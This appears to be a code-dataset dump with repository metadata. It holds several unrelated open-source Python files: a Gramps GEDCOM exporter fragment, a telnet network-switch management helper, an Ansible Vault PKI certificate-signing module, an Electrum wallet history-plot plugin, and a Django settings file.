self._writeln(index + 1, 'FAMC', '@%s@' % family.get_gramps_id()) if lds_ord.get_temple(): self._writeln(index + 1, 'TEMP', lds_ord.get_temple()) if lds_ord.get_place_handle(): place = self.dbase.get_place_from_handle( lds_ord.get_place_handle()) self._place(place, lds_ord.get_date_object(), 2) if lds_ord.get_status() != LdsOrd.STATUS_NONE: self._writeln(2, 'STAT', LDS_STATUS[lds_ord.get_status()]) self._note_references(lds_ord.get_note_list(), index + 1) self._source_references(lds_ord.get_citation_list(), index + 1) def _date(self, level, date): """ Write the 'DATE' GEDCOM token, along with the date in GEDCOM's expected format. """ self._datewritten = True start = date.get_start_date() if start != Date.EMPTY: cal = date.get_calendar() mod = date.get_modifier() quality = date.get_quality() if quality in libgedcom.DATE_QUALITY: qual_text = libgedcom.DATE_QUALITY[quality] + " " else: qual_text = "" if mod == Date.MOD_SPAN: val = "%sFROM %s TO %s" % ( qual_text, libgedcom.make_gedcom_date(start, cal, mod, None), libgedcom.make_gedcom_date(date.get_stop_date(), cal, mod, None)) elif mod == Date.MOD_RANGE: val = "%sBET %s AND %s" % ( qual_text, libgedcom.make_gedcom_date(start, cal, mod, None), libgedcom.make_gedcom_date(date.get_stop_date(), cal, mod, None)) else: val = libgedcom.make_gedcom_date(start, cal, mod, quality) self._writeln(level, 'DATE', val) elif date.get_text(): self._writeln(level, 'DATE', date.get_text()) else: self._datewritten = False def _person_name(self, name, attr_nick): """ n NAME <NAME_PERSONAL> {1:1} +1 NPFX <NAME_PIECE_PREFIX> {0:1} +1 GIVN <NAME_PIECE_GIVEN> {0:1} +1 NICK <NAME_PIECE_NICKNAME> {0:1} +1 SPFX <NAME_PIECE_SURNAME_PREFIX {0:1} +1 SURN <NAME_PIECE_SURNAME> {0:1} +1 NSFX <NAME_PIECE_SUFFIX> {0:1} +1 <<SOURCE_CITATION>> {0:M} +1 <<NOTE_STRUCTURE>> {0:M} """ gedcom_name = name.get_gedcom_name() firstname = name.get_first_name().strip() surns = [] surprefs = [] for surn in name.get_surname_list(): surns.append(surn.get_surname().replace('/', '?')) if surn.get_connector(): #we store connector with the surname surns[-1] = surns[-1] + ' ' + surn.get_connector() surprefs.append(surn.get_prefix().replace('/', '?')) surname = ', '.join(surns) surprefix = ', '.join(surprefs) suffix = name.get_suffix() title = name.get_title() nick = name.get_nick_name() if nick.strip() == '': nick = attr_nick self._writeln(1, 'NAME', gedcom_name) if int(name.get_type()) == NameType.BIRTH: pass elif int(name.get_type()) == NameType.MARRIED: self._writeln(2, 'TYPE', 'married') elif int(name.get_type()) == NameType.AKA: self._writeln(2, 'TYPE', 'aka') else: self._writeln(2, 'TYPE', name.get_type().xml_str()) if firstname: self._writeln(2, 'GIVN', firstname) if surprefix: self._writeln(2, 'SPFX', surprefix) if surname: self._writeln(2, 'SURN', surname) if name.get_suffix(): self._writeln(2, 'NSFX', suffix) if name.get_title(): self._writeln(2, 'NPFX', title) if nick: self._writeln(2, 'NICK', nick) self._source_references(name.get_citation_list(), 2) self._note_references(name.get_note_list(), 2) def _source_ref_record(self, level, citation_handle): """ n SOUR @<XREF:SOUR>@ /* pointer to source record */ {1:1} +1 PAGE <WHERE_WITHIN_SOURCE> {0:1} +1 EVEN <EVENT_TYPE_CITED_FROM> {0:1} +2 ROLE <ROLE_IN_EVENT> {0:1} +1 DATA {0:1} +2 DATE <ENTRY_RECORDING_DATE> {0:1} +2 TEXT <TEXT_FROM_SOURCE> {0:M} +3 [ CONC | CONT ] <TEXT_FROM_SOURCE> {0:M} +1 QUAY <CERTAINTY_ASSESSMENT> {0:1} +1 <<MULTIMEDIA_LINK>> {0:M} ,* +1 <<NOTE_STRUCTURE>> {0:M} """ citation = 
self.dbase.get_citation_from_handle(citation_handle) src_handle = citation.get_reference_handle() if src_handle is None: return src = self.dbase.get_source_from_handle(src_handle) if src is None: return # Reference to the source self._writeln(level, "SOUR", "@%s@" % src.get_gramps_id()) if citation.get_page() != "": # PAGE <WHERE_WITHIN_SOURCE> can not have CONC lines. # WHERE_WITHIN_SOURCE:= {Size=1:248} # Maximize line to 248 and set limit to 248, for no line split self._writeln(level + 1, 'PAGE', citation.get_page()[0:248], limit=248) conf = min(citation.get_confidence_level(), Citation.CONF_VERY_HIGH) if conf != Citation.CONF_NORMAL and conf != -1: self._writeln(level + 1, "QUAY", QUALITY_MAP[conf]) if not citation.get_date_object().is_empty(): self._writeln(level + 1, 'DATA') self._date(level + 2, citation.get_date_object()) if len(citation.get_note_list()) > 0: note_list = [self.dbase.get_note_from_handle(h) for h in citation.get_note_list()] note_list = [n for n in note_list if n.get_type() == NoteType.SOURCE_TEXT] if note_list: ref_text = note_list[0].get() else: ref_text = "" if ref_text != "" and citation.get_date_object().is_empty(): self._writeln(level + 1, 'DATA') if ref_text != "": self._writeln(level + 2, "TEXT", ref_text) note_list = [self.dbase.get_note_from_handle(h) for h in citation.get_note_list()] note_list = [n.handle for n in note_list if n and n.get_type() != NoteType.SOURCE_TEXT] self._note_references(note_list, level + 1) self._photos(citation.get_media_list(), level + 1) even = None for srcattr in citation.get_attribute_list(): if str(srcattr.type) == "EVEN": even = srcattr.value self._writeln(level + 1, "EVEN", even) break if even: for srcattr in citation.get_attribute_list(): if str(srcattr.type) == "EVEN:ROLE": self._writeln(level + 2, "ROLE", srcattr.value) break def _photo(self, photo, level): """ n OBJE {1:1} +1 FORM <MULTIMEDIA_FORMAT> {1:1} +1 TITL <DESCRIPTIVE_TITLE> {0:1} +1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ photo_obj_id = photo.get_reference_handle() photo_obj = self.dbase.get_media_from_handle(photo_obj_id) if photo_obj: mime = photo_obj.get_mime_type() form = MIME2GED.get(mime, mime) path = media_path_full(self.dbase, photo_obj.get_path()) if not os.path.isfile(path): return self._writeln(level, 'OBJE') if form: self._writeln(level + 1, 'FORM', form) self._writeln(level + 1, 'TITL', photo_obj.get_description()) self._writeln(level + 1, 'FILE', path, limit=255) self._note_references(photo_obj.get_note_list(), level + 1) def _place(self, place, dateobj, level): """ PLACE_STRUCTURE:= n PLAC <PLACE_NAME> {1:1} +1 FORM <PLACE_HIERARCHY> {0:1} +1 FONE <PLACE_PHONETIC_VARIATION> {0:M} # not used +2 TYPE <PHONETIC_TYPE> {1:1} +1 ROMN <PLACE_ROMANIZED_VARIATION> {0:M} # not used +2 TYPE <ROMANIZED_TYPE> {1:1} +1 MAP {0:1} +2 LATI <PLACE_LATITUDE> {1:1} +2 LONG <PLACE_LONGITUDE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ if place is None: return place_name = _pd.display(self.dbase, place, dateobj) self._writeln(level, "PLAC", place_name.replace('\r', ' '), limit=120) longitude = place.get_longitude() latitude = place.get_latitude() if longitude and latitude: (latitude, longitude) = conv_lat_lon(latitude, longitude, "GEDCOM") if longitude and latitude: self._writeln(level + 1, "MAP") self._writeln(level + 2, 'LATI', latitude) self._writeln(level + 2, 'LONG', longitude) # The Gedcom standard shows that an optional address structure can # be written out in the event detail. 
        # http://homepages.rootsweb.com/~pmcbride/gedcom/55gcch2.htm#EVENT_DETAIL
        location = get_main_location(self.dbase, place)
        street = location.get(PlaceType.STREET)
        locality = location.get(PlaceType.LOCALITY)
        city = location.get(PlaceType.CITY)
        state = location.get(PlaceType.STATE)
        country = location.get(PlaceType.COUNTRY)
        postal_code = place.get_code()

        if street or locality or city or state or postal_code or country:
            self._writeln(level, "ADDR", street)
            if street:
                self._writeln(level + 1, 'ADR1', street)
            if locality:
                self._writeln(level + 1, 'ADR2', locality)
            if city:
                self._writeln(level + 1, 'CITY', city)
            if state:
                self._writeln(level + 1, 'STAE', state)
            if postal_code:
                self._writeln(level + 1, 'POST', postal_code)
            if country:
                self._writeln(level + 1, 'CTRY', country)
        self._note_references(place.get_note_list(), level + 1)

    def __write_addr(self, level, addr):
        """
        n ADDR <ADDRESS_LINE> {0:1}
        +1 CONT <ADDRESS_LINE> {0:M}
        +1 ADR1 <ADDRESS_LINE1> {0:1} (Street)
        +1 ADR2 <ADDRESS_LINE2> {0:1} (Locality)
        +1 CITY <ADDRESS_CITY> {0:1}
        +1 STAE <ADDRESS_STATE> {0:1}
        +1 POST <ADDRESS_POSTAL_CODE> {0:1}
        +1 CTRY <ADDRESS_COUNTRY> {0:1}

        This is done along the lines suggested by Tamura Jones in
        http://www.tamurajones.net/GEDCOMADDR.xhtml as a result of bug 6382.
        "GEDCOM writers should always use the structured address format,
        and use it for all addresses, including the submitter address and
        their own corporate address." "Vendors that want their product to
        pass even the strictest GEDCOM validation, should include export
        to the old free-form format..." [This goes on to say the free-form
        should be an option, but we have not made it an option in Gramps.]

        @param level: The level number for the ADDR tag
        @type level: Integer
        @param addr: The location or address
        @type addr: [a super-type of] LocationBase
        """
        # get_postal_code() must be called here; the bare bound method is
        # always truthy, which made this condition unconditionally true.
        if addr.get_street() or addr.get_locality() or addr.get_city() or \
                addr.get_state() or addr.get_postal_code() or \
                addr.get_country():
            self._writeln(level, 'ADDR', addr.get_street())
            if addr.get_locality():
                self._writeln(level + 1, 'CONT', addr.get_locality())
            if addr.get_city():
                self._writeln(level + 1, 'CONT', addr.get_city())
            if addr.get_state():
                self._writeln(level + 1, 'CONT', addr.get_state())
            if addr.get_postal_code():
                self._writeln(level + 1, 'CONT', addr.get_postal_code())
            if addr.get_country():
                self._writeln(level + 1, 'CONT', addr.get_country())

            if addr.get_street():
                self._writeln(level + 1, 'ADR1', addr.get_street())
            if addr.get_locality():
                self._writeln(level + 1, 'ADR2', addr.get_locality())
            if addr.get_city():
                self._writeln(level + 1, 'CITY', addr.get_city())
            if addr.get_state():
                self._writeln(level + 1, 'STAE', addr.get_state())
            if addr.get_postal_code():
                self._writeln(level + 1, 'POST', addr.get_postal_code())
            if addr.get_country():
                self._writeln(level + 1, 'CTRY', addr.get_country())

#-------------------------------------------------------------------------
#
# export_data
#
#-------------------------------------------------------------------------
def export_data(database, filename, user, option_box=None):
    """
    External interface used to register with the plugin system.
    """
    ret = False
    try:
        ged_write = GedcomWriter(database, user, option_box)
        ret = ged_write.write_gedcom_file(filename)
    except IOError as msg:
        msg2 = _("Could not create %s") % filename
        user.notify_error(msg2, str(msg))
    except DatabaseError as msg:
        user.notify_db_error("%s\n%s" % (_("GEDCOM Export failed"), str(msg)))
    return ret
gpl-2.0
-1,091,929,293,636,996,400
37.137667
81
0.520455
false
3.604482
false
false
false
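The GEDCOM writer above funnels all output through a level/tag/value line convention, with the Gramps ID doubling as the GEDCOM XREF on level-0 record lines. A minimal sketch of that convention follows, assuming a simplified writeln; the module's real _writeln (defined earlier in the file) additionally splits long values across CONC/CONT continuation lines, so this is an illustration, not the actual implementation.

import sys

def writeln(out, level, token, value=""):
    # One GEDCOM line: '<level> <TAG> [<value>]'.
    if value:
        out.write("%d %s %s\n" % (level, token, value))
    else:
        out.write("%d %s\n" % (level, token))

# A fragment shaped like the output of _person_name() and _gender();
# @I0001@ is a hypothetical XREF standing in for a Gramps ID. Note that
# the level-0 record line puts the XREF in the token position, which is
# why the writer calls _writeln(0, '@%s@' % gramps_id, 'INDI').
writeln(sys.stdout, 0, "@I0001@", "INDI")
writeln(sys.stdout, 1, "NAME", "John /Smith/")
writeln(sys.stdout, 2, "GIVN", "John")
writeln(sys.stdout, 2, "SURN", "Smith")
writeln(sys.stdout, 1, "SEX", "M")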
berserkerbernhard/Lidskjalv
code/networkmonitor/modules/misc/switchhandler.py
1
6889
from modules.lidskjalvloggingtools import loginfo import telnetlib import time WAIT = 5 class SwitchHandler(): def __init__(self, u, p, e): self.loginpasswords = [p] self.loginusername = u self.loginenable = e self.logintries = 5 self.telnettimeout = 10 def get_switch_name(self, tn): if tn is None: raise Exception("NOT A TELNET CONNECTION!!!!!!") tn.write(b"\n") RES = str(tn.read_until(b"#", 2)) loginfo(RES) switchname = RES.split("#")[0].split("\\n")[1] loginfo("switchname: %s" % switchname) return switchname def login_to_switch(self, tn): if tn is None: raise Exception("NOT A TELNET CONNECTION", "in function loginToSwitch!!!!!!") for loginpassword in self.loginpasswords: loginfo("Trying password: %s" % (loginpassword)) RES = tn.read_until(b":", 2) loginfo("Connection read data: %s" % RES) loginfo(">>>> Sending password: %s" % loginpassword) tn.write(loginpassword.encode('ascii') + b"\n") loginfo(">>>> Sending password DONE") RES = tn.read_until(b":", 2) loginfo("Connection read data: %s" % RES) if ">" in str(RES): loginfo("+++++++++ Logged in !!!!!!!!!!") return [tn, loginpassword] return None def enableSwitch(self, tn): print(tn) loginfo("enableSwitch start") if tn is None: raise Exception("NOT A TELNET CONNECTION!!!!!!") tn.write(b"\n") RES = tn.read_until(b":", 2) print("RES:", RES) loginfo("RES: %s" % str(RES)) if "Bad passwords" in str(RES): print("Try log in again with another password(%s)" % self.loginenable) if ">" in str(RES) \ or "Password" in str(RES) \ or "User Access Verification" in str(RES): loginfo("Ready for enable ...") t = b"enable\n" print(t) tn.write(t) RES = tn.read_until(b":", 2) print("RES:", RES) loginfo("Attempting to log in.") # mbs loginfo("Sending enable: %s" % self.loginenable) print("Sending enable: %s" % self.loginenable) tn.write(self.loginenable.encode('ascii') + b"\n") print("login enable sent. Testing for response.") RES = tn.read_until(b"#", self.telnettimeout) loginfo(RES) if "#" in str(RES): loginfo("We're logged in.") return tn else: loginfo("Still not logged in. :-(") loginfo("Nothing happended!!! WTF???") return None def openTelnetConnection(self, HOST): print("Try login to host: %s" % HOST) for thistry in range(self.logintries): loginfo("Try: %s" % str(thistry + 1)) try: print(HOST, 23, self.telnettimeout) tn = telnetlib.Telnet(HOST, 23, self.telnettimeout) loginfo("Connection established to %s." 
% HOST) return tn except: loginfo("Failed to open connection: %s" % HOST) return None # def setVTPMode(self, tn, HOSTNAME, device): # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("conf t\r\n") # resultdata = tn.read_until("#", 5) # if device == "172.17.128.61": # print "VTP Server:", device # tn.write("vtp mode server\r\n") # else: # print "VTP Client:", device # tn.write("vtp mode client\r\n") # resultdata = tn.read_until("#", 5) # tn.write("vtp domain VTP-20141209-1\r\n") # resultdata = tn.read_until("#", 5) # tn.write("vtp password FSNAAL-VTP\r\n") # resultdata = tn.read_until("#", 5) # tn.write("exit\r\n") # resultdata = tn.read_until("#", 5) # tn.write("wr\r\n") # resultdata = tn.read_until("#", 5) def setTermLen(self, tn): tn.write(b"terminal length 0\n") loginfo(tn.read_until(b"#", WAIT)) def get_interfaces(self, tn): tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"sh int\r\n") r = str(tn.read_until(b"#", self.telnettimeout)) r = "\n".join(r.split("\\r\\n")) loginfo("Result from show interfaces:\n%s" % r) return r def get_cdp_neighbors_detail(self, tn): tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"sh cdp neighbors detail\r\n") resultdata = tn.read_until(b"#", self.telnettimeout) return resultdata.decode() def writeDescriptionToInterface(self, tn, interface, description): loginfo("1: %s" % tn.read_until(b"#", WAIT)) tn.write(b"conf t\r\n") loginfo("2: %s" % tn.read_until(b"#", WAIT)) sendstring = "int %s\r\n" % interface tn.write(sendstring.encode()) loginfo(tn.read_until(b"#", WAIT)) loginfo("3: %s" % tn.read_until(b"#", WAIT)) sendstring = "description %s %s\r\n" % (description, time.ctime()) tn.write(sendstring.encode()) loginfo(tn.read_until(b"#", WAIT)) loginfo("4: %s" % tn.read_until(b"#", WAIT)) tn.write(b"exit\r\n") loginfo("5: %s" % tn.read_until(b"#", WAIT)) tn.write(b"exit\r\n") loginfo("6: %s" % tn.read_until(b"#", WAIT)) tn.write(b"wr\r\n") loginfo(tn.read_until(b"#", WAIT)) def showRunningConfig(self, tn): tn.read_until(b"#", WAIT) tn.write(b"sh run\r\n") r = tn.read_until(b"#", WAIT) r = str(r) r = r.replace("\\r\\n", "\n") # print(r) return r def addDescriptionToAllTrunkInterfaces(self, tn): neighbors = self.getCdpNeighborsDetail(tn, "") # print("neighbors", neighbors) for neighbor in neighbors: # print("neighbor", neighbor) if neighbor != ["", "", ""]: self.writeDescriptionToInterface(tn, neighbor[1], "%s %s" % (neighbor[0], neighbor[2]))
gpl-3.0
8,448,278,225,030,082,000
32.935961
74
0.497169
false
3.378617
false
false
false
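A hedged usage sketch for the SwitchHandler class above: the import path is inferred from the file's location, and the address and credentials are placeholders rather than values from the module. The return conventions (list-or-None from login_to_switch, connection-or-None elsewhere) follow the method bodies shown above.

from modules.misc.switchhandler import SwitchHandler  # assumed import path

handler = SwitchHandler("admin", "login-secret", "enable-secret")  # u, p, e
tn = handler.openTelnetConnection("192.0.2.10")  # placeholder TEST-NET address
if tn is not None:
    login = handler.login_to_switch(tn)      # returns [tn, password] or None
    if login is not None:
        tn = handler.enableSwitch(login[0])  # returns the connection or None
        if tn is not None:
            handler.setTermLen(tn)           # disable paging before long output
            print(handler.get_switch_name(tn))
            print(handler.get_cdp_neighbors_detail(tn))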
TerryHowe/ansible-modules-hashivault
ansible/modules/hashivault/hashivault_pki_cert_sign.py
1
6865
#!/usr/bin/env python
from ansible.module_utils.hashivault import hashivault_auth_client
from ansible.module_utils.hashivault import hashivault_argspec
from ansible.module_utils.hashivault import hashivault_init
from ansible.module_utils.hashivault import hashiwrapper

ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.1'}
DOCUMENTATION = r'''
---
module: hashivault_pki_cert_sign
version_added: "4.5.0"
short_description: Hashicorp Vault PKI Sign CSR (Certificate / Intermediate / Verbatim)
description:
    - This module signs a new certificate based upon the provided CSR and the supplied parameters.
options:
    csr:
        required: true
        description:
            - Specifies the PEM-encoded CSR.
    role:
        description:
            - Specifies the name of the role used to sign the certificate.
            - 'For the *verbatim* type, if set, the following parameters from the role will take effect: `ttl`, `max_ttl`, `generate_lease`, and `no_store`.'
    common_name:
        description:
            - Specifies the requested CN for the certificate. If the CN is allowed by role policy, it will be issued.
    mount_point:
        default: pki
        description:
            - Location where the secrets engine is mounted, also known as the path.
    type:
        type: str
        description:
            - Use `certificate` to sign a new certificate based upon the provided CSR and the supplied parameters, subject to the restrictions contained in the role named in the endpoint. The issuing CA certificate is returned as well, so that only the root CA need be in a client's trust store.
            - Use `intermediate` to have the configured CA certificate issue a certificate with appropriate values for acting as an intermediate CA. Distribution points use the values set via config/urls. Values set in the CSR are ignored unless use_csr_values is set to true, in which case the values from the CSR are used verbatim.
            - Use `verbatim` to sign a new certificate based upon the provided CSR. Values are taken verbatim from the CSR; the only restriction is that this endpoint will refuse to issue an intermediate CA certificate (use the `intermediate` type for that functionality).
        choices: ["certificate", "intermediate", "verbatim"]
        default: certificate
    extra_params:
        description: Extra parameters depending on the type.
type: dict extends_documentation_fragment: - hashivault ''' EXAMPLES = r''' --- - hosts: localhost tasks: - hashivault_pki_cert_sign: role: 'tester' common_name: 'test.example.com' register: cert - debug: msg="{{ cert }}" ''' def main(): argspec = hashivault_argspec() argspec['csr'] = dict(required=True, type='str') argspec['role'] = dict(required=False, type='str') argspec['common_name'] = dict(required=False, type='str') argspec['extra_params'] = dict(required=False, type='dict', default={}) argspec['mount_point'] = dict(required=False, type='str', default='pki') argspec['type'] = dict(required=False, type='str', default='certificate', choices=["certificate", "intermediate", "verbatim"]) module = hashivault_init(argspec) result = hashivault_pki_cert_sign(module) if result.get('failed'): module.fail_json(**result) else: module.exit_json(**result) def certificate(params, mount_point, client): csr = params.get('csr') common_name = params.get('common_name') extra_params = params.get('extra_params') role = params.get('role').strip('/') # check if role exists try: current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data') except Exception: current_state = {} if not current_state: return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'} if not common_name: return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_certificate(csr=csr, name=role, mount_point=mount_point, common_name=common_name, extra_params=extra_params).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result def intermediate(params, mount_point, client): csr = params.get('csr') common_name = params.get('common_name') extra_params = params.get('extra_params') if not common_name: return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_intermediate(csr=csr, common_name=common_name, extra_params=extra_params, mount_point=mount_point).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result def verbatim(params, mount_point, client): csr = params.get('csr') extra_params = params.get('extra_params') role = params.get('role').strip('/') # check if role exists try: current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data') except Exception: current_state = {} if not current_state: return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_verbatim(csr=csr, name=role, extra_params=extra_params, mount_point=mount_point).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result @hashiwrapper def hashivault_pki_cert_sign(module): supported_types = { 'certificate': certificate, 'intermediate': intermediate, 'verbatim': verbatim } params = module.params client = hashivault_auth_client(params) mount_point = params.get('mount_point').strip('/') return supported_types[params.get('type')](params=params, mount_point=mount_point, client=client) if __name__ == '__main__': main()
mit
-7,423,627,915,068,720,000
37.567416
120
0.606555
false
4.103407
false
false
false
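Outside of Ansible, the `certificate` branch of the hashivault_pki_cert_sign module above reduces to a single hvac call. A sketch under assumptions: the Vault address, token, CSR path, and TTL are illustrative, the role name is the one from the module's EXAMPLES section, and the call mirrors the sign_certificate invocation made by the module's certificate() helper; the response fields follow Vault's sign endpoint.

import hvac

client = hvac.Client(url="https://vault.example.com:8200", token="s.placeholder")
with open("test.example.com.csr") as csr_file:
    csr = csr_file.read()

# Mirrors the client.secrets.pki.sign_certificate() call in certificate().
response = client.secrets.pki.sign_certificate(
    csr=csr,
    name="tester",                  # role name, as in the EXAMPLES section
    mount_point="pki",
    common_name="test.example.com",
    extra_params={"ttl": "72h"},    # assumed optional parameter
)
print(response["data"]["certificate"])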
justinvforvendetta/electrum-boli
plugins/plot.py
1
3669
from PyQt4.QtGui import *
from electrum_boli.plugins import BasePlugin, hook
from electrum_boli.i18n import _
import datetime
from electrum_boli.util import format_satoshis
from electrum_boli.bitcoin import COIN

try:
    import matplotlib.pyplot as plt
    import matplotlib.dates as md
    from matplotlib.patches import Ellipse
    from matplotlib.offsetbox import AnchoredOffsetbox, TextArea, DrawingArea, HPacker
    flag_matlib = True
except ImportError:
    # matplotlib is optional; without it the plugin reports itself unavailable
    flag_matlib = False


class Plugin(BasePlugin):

    def is_available(self):
        return flag_matlib

    @hook
    def init_qt(self, gui):
        self.win = gui.main_window

    @hook
    def export_history_dialog(self, d, hbox):
        self.wallet = d.wallet
        history = self.wallet.get_history()
        if len(history) > 0:
            b = QPushButton(_("Preview plot"))
            hbox.addWidget(b)
            b.clicked.connect(lambda: self.do_plot(self.wallet, history))
        else:
            b = QPushButton(_("No history to plot"))
            hbox.addWidget(b)

    def do_plot(self, wallet, history):
        balance_Val = []
        fee_val = []
        value_val = []
        datenums = []
        unknown_trans = 0
        pending_trans = 0
        counter_trans = 0
        balance = 0
        for item in history:
            tx_hash, confirmations, value, timestamp, balance = item
            if confirmations:
                if timestamp is not None:
                    try:
                        datenums.append(md.date2num(datetime.datetime.fromtimestamp(timestamp)))
                        balance_Val.append(1000. * balance / COIN)
                    # the exception classes must be a tuple, not a list,
                    # for the clause to actually match
                    except (RuntimeError, TypeError, NameError):
                        unknown_trans += 1
                else:
                    unknown_trans += 1
            else:
                pending_trans += 1

            value_val.append(1000. * value / COIN)

            if tx_hash:
                label, is_default_label = wallet.get_label(tx_hash)
                label = label.encode('utf-8')
            else:
                label = ""

        f, axarr = plt.subplots(2, sharex=True)
        plt.subplots_adjust(bottom=0.2)
        plt.xticks(rotation=25)
        ax = plt.gca()
        x = 19
        test11 = ("Unknown transactions = " + str(unknown_trans)
                  + " Pending transactions = " + str(pending_trans) + " .")
        box1 = TextArea(" Test : Number of pending transactions", textprops=dict(color="k"))
        box1.set_text(test11)
        box = HPacker(children=[box1], align="center", pad=0.1, sep=15)
        anchored_box = AnchoredOffsetbox(loc=3,
                                         child=box,
                                         pad=0.5,
                                         frameon=True,
                                         bbox_to_anchor=(0.5, 1.02),
                                         bbox_transform=ax.transAxes,
                                         borderpad=0.5,
                                         )
        ax.add_artist(anchored_box)

        plt.ylabel('mBOLI')
        plt.xlabel('Dates')
        xfmt = md.DateFormatter('%Y-%m-%d')
        ax.xaxis.set_major_formatter(xfmt)
        axarr[0].plot(datenums, balance_Val, marker='o', linestyle='-', color='blue', label='Balance')
        axarr[0].legend(loc='upper left')
        axarr[0].set_title('History Transactions')
        axarr[1].plot(datenums, value_val, marker='o', linestyle='-', color='green', label='Value')
        axarr[1].legend(loc='upper left')
        # plt.annotate('unknown transaction = %d \n pending transactions = %d' %(unknown_trans,pending_trans),xy=(0.7,0.05),xycoords='axes fraction',size=12)
        plt.show()
gpl-3.0
-4,475,255,244,508,078,600
28.119048
156
0.562551
false
3.806017
false
false
false
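The date-axis plotting pattern used by do_plot() in the plot plugin above, reduced to a self-contained sketch; the timestamps and balances below are synthetic stand-ins for wallet history, not real data.

import datetime

import matplotlib.dates as md
import matplotlib.pyplot as plt

timestamps = [datetime.datetime(2015, 1, day) for day in (5, 12, 19, 26)]  # synthetic
balances = [0.0, 1.5, 1.2, 2.8]  # synthetic mBOLI values

datenums = [md.date2num(t) for t in timestamps]  # matplotlib's float date format
fig, ax = plt.subplots()
ax.plot(datenums, balances, marker='o', linestyle='-', color='blue', label='Balance')
ax.xaxis.set_major_formatter(md.DateFormatter('%Y-%m-%d'))  # render dates, not floats
ax.legend(loc='upper left')
plt.xticks(rotation=25)
plt.ylabel('mBOLI')
plt.xlabel('Dates')
plt.show()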
subash68/pyconvideo
src/pyconvideo/settings.py
1
3180
""" Django settings for pyconvideo project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '$@_5k3q-++9=bs50d0+tjkw^(iy+_5z$ycu!9l-o-r4_co1#ww' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'pyconvideo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'pyconvideo.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
gpl-3.0
-5,179,506,293,819,358,000
24.853659
91
0.688679
false
3.517699
false
false
false
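The SECURITY WARNING comments in the generated Django settings module above are normally resolved before deployment by reading the sensitive values from the environment. A minimal sketch, assuming DJANGO_*-prefixed variable names (an illustrative convention, not part of the generated file):

import os

# Fall back to an obviously-insecure key so local development still works.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'dev-only-insecure-key')
DEBUG = os.environ.get('DJANGO_DEBUG', '') == '1'
ALLOWED_HOSTS = [host.strip()
                 for host in os.environ.get('DJANGO_ALLOWED_HOSTS', '').split(',')
                 if host.strip()]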
xiang12835/python_web
py2_web2py/web2py/gluon/packages/dal/pydal/contrib/imap_adapter.py
4
43046
